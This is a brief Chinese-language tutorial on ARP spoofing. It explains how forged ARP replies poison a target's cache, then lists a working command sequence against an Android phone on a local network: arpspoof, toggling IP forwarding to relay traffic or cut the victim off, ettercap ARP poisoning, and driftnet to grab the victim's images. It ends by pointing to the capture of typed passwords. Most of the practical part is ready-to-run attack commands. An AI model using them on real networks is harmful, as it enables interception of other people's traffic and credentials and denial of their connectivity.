0x00 原理分析 ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大 量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就 能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。 ARP攻击主要是存在于局域网网络中,局域网中若有一台计算机感染ARP木马, 则感染该ARP木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计 算机的通信信息,并因此造成网内其它计算机的通信故障
0x01实战准备
攻击机(kail linux):192.168.1.106(IP地址)
靶机(手机Android):192.168.1.101(IP地址)
所需工具:
arpspoof: -i 表示网卡 -t 表示目标
ettercap: -i 表示网卡 -M 表示开启欺骗
driftnet
0x02 实战过程
arpspoof -i eth0 -t 192.168.1.101 192.168.1.1(网关)(图片截图截错了,这个是我测试主机与虚拟机的)
转流
echo "1">/proc/sys/net/ipv4/ip_forward (arp欺骗)
echo "0">/proc/sys/net/ipv4/ip_forward (arp断网)
开启欺骗
ettercap -T -q -i eth0 -M arp:remote /192.168.1.101/192.168.1.1/
获取图片
driftnet -i eth0
不仅仅是抓取图片
我们可以想象一下如果你在输入账号密码会发生什么